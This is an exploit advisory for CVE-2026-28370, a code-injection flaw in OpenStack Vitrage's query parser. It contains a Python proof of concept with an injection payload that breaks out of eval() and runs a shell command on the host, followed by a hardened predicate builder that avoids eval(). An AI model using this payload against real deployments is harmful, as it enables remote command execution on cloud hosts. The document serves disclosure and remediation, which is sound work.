| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2026-28370 | 27 Feb 2026 04:56 | – | attackerkb |
| March Linux Patch Wednesday | 30 Mar 2026 20:00 | – | avleonov |
| CVE-2026-28370 | 27 Feb 2026 05:20 | – | circl |
| OpenStack Vitrage security vulnerability | 27 Feb 2026 00:00 | – | cnnvd |
| CVE-2026-28370 | 27 Feb 2026 04:56 | – | cve |
| CVE-2026-28370 | 27 Feb 2026 04:56 | – | cvelist |
| CVE-2026-28370 | 27 Feb 2026 04:56 | – | debiancve |
| EUVD-2026-8999 | 27 Feb 2026 06:31 | – | euvd |
| OpenStack Vitrage: Unauthorized Access to the Host can Lead to Eval Injection | 27 Feb 2026 06:31 | – | github |
| CVE-2026-28370 | 27 Feb 2026 05:18 | – | nvd |
=============================================================================================================================================
| # Title : OpenStack Vitrage (before 12.0.1, 13.0.0, 14.0.0, and 15.0.0) Query Parser Remote Code Execution via Unsafe eval() Usage |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.openstack.org/ |
=============================================================================================================================================
[+] Summary : CVE-2026-28370. A Remote Code Execution (RCE) vulnerability exists in the query parser of OpenStack Vitrage prior to versions 12.0.1, 13.0.0, 14.0.0, and 15.0.0 (the fixed releases).
The issue resides in the _create_query_function method in:
vitrage/graph/query.py
The vulnerability is caused by unsafe use of Python's eval() when query predicates are built dynamically. User-controlled input supplied via the Vitrage API is spliced directly into a string of Python source, and that string is then executed with eval().
Because the input is neither sanitized nor parsed as data, an authenticated user with API access can close the quoted value, append arbitrary Python code, and reopen the quote so the generated expression still parses. The injected code runs on the host serving Vitrage, under the privileges of the service account, which is enough to execute system-level commands.
[+] POC : https://www.youtube.com/watch?v=IjBH-hu3UfQ
```python
import os  # not used directly; the payload reaches os through __import__


def _evaluable_str(value):
    """Wraps the value in single quotes if it's a string."""
    if isinstance(value, str):
        return "'" + value + "'"
    return str(value)


def create_predicate(query_dict):
    """
    Simplified version of the vulnerable logic.
    It builds a string and passes it to eval().
    """
    # Only the '==' operator is modelled. The value is spliced into source
    # text, so a single quote inside it terminates the string literal.
    key, val = list(query_dict['=='].items())[0]
    expression = f"(item.get('{key}') == {_evaluable_str(val)})"
    full_cmd = "lambda item: " + expression
    print(f"Executing built string: {full_cmd}")
    return eval(full_cmd)


# Closes the quoted value, chains a shell command, and reopens the quote so
# the generated lambda still parses. The command runs when match() is called.
malicious_payload = "') or __import__('os').system('id > /tmp/hack.txt') or ('"
query = {
    "==": {
        "ANY_KEY": malicious_payload
    }
}

try:
    match = create_predicate(query)
    match({'ANY_KEY': 'Pwnd By indoushka'})
    print("\n[+] Success: Check /tmp/hack.txt for the command output.")
except Exception as e:
    print(f"\n[-] Failed to execute: {e}")
```
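The hardened counterpart of the simplified PoC above, written here as an added example; it is not Vitrage's own code and not its upstream fix. It assumes the query-dict shape the PoC uses ({'==': {key: value}}) extended with the comparison and boolean operators listed in _COMPARISONS and ('and', 'or'), which is an assumption about the query language. QueryError, is_valid_query, run_query, SAMPLE_ITEMS and PAYLOAD are constructed for this example. The point is that the query is walked as data and each operator becomes a closure, so the PoC payload is only ever compared as a string and never reaches eval().

```python
"""Predicate builder that walks the query as data instead of eval()ing text.

Added example, not Vitrage's own code and not its upstream fix. Assumes the
query-dict shape used by the PoC ({'==': {key: value}}) plus the comparison
and boolean operators below; sample items and helper names are constructed.
"""
import operator

# Assumed operator set; each maps to a function, never to source text.
_COMPARISONS = {
    '==': operator.eq,
    '!=': operator.ne,
    '<': operator.lt,
    '<=': operator.le,
    '>': operator.gt,
    '>=': operator.ge,
}


class QueryError(ValueError):
    """Raised for a query that does not fit the expected shape."""


def create_predicate(query_dict):
    """Return match(item) -> bool for a query dict, without eval().

    Every operator becomes a closure and every value stays a Python object,
    so a value such as the PoC payload is only ever compared, never executed.
    """
    if not isinstance(query_dict, dict) or len(query_dict) != 1:
        raise QueryError('query must be a dict with exactly one operator')
    (op, operand), = query_dict.items()

    if op in ('and', 'or'):
        if not isinstance(operand, list) or not operand:
            raise QueryError(f'{op!r} expects a non-empty list of sub-queries')
        subs = [create_predicate(sub) for sub in operand]
        combine = all if op == 'and' else any
        return lambda item: combine(p(item) for p in subs)

    if op in _COMPARISONS:
        compare = _COMPARISONS[op]
        if not isinstance(operand, dict) or len(operand) != 1:
            raise QueryError(f'{op!r} expects a single {{property: value}} pair')
        (key, value), = operand.items()
        if not isinstance(key, str):
            raise QueryError('property name must be a string')

        def match(item):
            try:
                return compare(item.get(key), value)
            except TypeError:
                # e.g. '<' between a string and an int: treat as no match
                return False
        return match

    raise QueryError(f'unsupported operator {op!r}')


def is_valid_query(query_dict):
    """True if the query parses into a predicate, False on a shape error."""
    try:
        create_predicate(query_dict)
        return True
    except QueryError:
        return False


# Constructed sample vertices standing in for Vitrage graph entities.
SAMPLE_ITEMS = [
    {'vitrage_id': 'a1', 'vitrage_category': 'ALARM', 'severity': 'CRITICAL'},
    {'vitrage_id': 'a2', 'vitrage_category': 'ALARM', 'severity': 'WARNING'},
    {'vitrage_id': 'h1', 'vitrage_category': 'RESOURCE', 'vitrage_type': 'nova.host'},
]

# The PoC payload: under eval() it runs a shell command; here it is inert.
PAYLOAD = "') or __import__('os').system('id > /tmp/hack.txt') or ('"


def run_query(query_dict, items=SAMPLE_ITEMS):
    """Apply the query and return matching vitrage_ids in input order."""
    match = create_predicate(query_dict)
    return [item['vitrage_id'] for item in items if match(item)]


if __name__ == '__main__':
    print(run_query({'and': [{'==': {'vitrage_category': 'ALARM'}},
                             {'!=': {'severity': 'WARNING'}}]}))
    print(run_query({'==': {'ANY_KEY': PAYLOAD}}))
```

Running the PoC query through run_query returns an empty list and creates no file: the payload is compared with each item's ANY_KEY and nothing else happens. Shape errors surface as QueryError before any predicate exists, which is where an API layer should reject a malformed query instead of letting it reach the graph.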
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================